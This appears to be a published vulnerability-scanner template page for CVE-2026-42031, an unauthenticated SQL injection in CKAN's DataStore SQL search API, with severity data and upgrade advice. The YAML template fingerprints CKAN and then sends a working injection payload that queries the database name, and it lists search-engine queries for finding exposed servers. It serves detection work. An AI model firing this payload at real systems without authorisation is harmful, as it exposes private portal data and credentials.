CKAN DataStore SQL Search - SQL Injection
CVE-2026-42031
Verified
Description
CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
Severity
High
CVSS Score
9.8
Exploit Probability
14%
Published Date
May 4, 2026
Template Author
theamanrawat
CVE-2026-42031.yaml

id: CVE-2026-42031

info:
  name: CKAN DataStore SQL Search - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
  impact: |
    An unauthenticated attacker can read arbitrary data from the PostgreSQL database including system catalog tables, private DataStore resources, and potentially user credentials.
  remediation: |
    Upgrade CKAN to version 2.10.10 or 2.11.5 or later.
  reference:
    - https://github.com/advisories/GHSA-h7j7-3rx6-xvcg
    - https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42031
    epss-score: 0.13784
    epss-percentile: 0.94372
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"CKAN"
    fofa-query: title="CKAN"
  tags: cve,cve2026,ckan,sqli,datastore,unauth

flow: http(1) && http(2)

http:
  # Request 1: fingerprint CKAN via the status_show action; results are internal only
  - method: GET
    path:
      - "{{BaseURL}}/api/action/status_show"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ckan_version"
          - '"success": true'
        condition: and
        internal: true

      - type: status
        status:
          - 200
        internal: true

  # Request 2: only runs when request 1 matched (see flow); checks the datastore_search_sql endpoint
  - method: GET
    path:
      - "{{BaseURL}}/api/action/datastore_search_sql?sql=SELECT+ts_rewrite('a'::tsquery,+'SELECT+''a''::tsquery,+(SELECT+current_database())::tsquery')"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"success": true'
          - "ts_rewrite"
          - "records"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022009a4a0dcc77cba85322fee450a2bf1d0c9b8d8a7c39ba51f1dba2bcb63265d34022100d07ba14195247912e8bb20724bdd3d7516caae7e9d466cb529eca32aed58e946:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2026-42031
CWE ID: CWE-89
Remediation Steps
Upgrade CKAN to version 2.10.10 or 2.11.5 or later.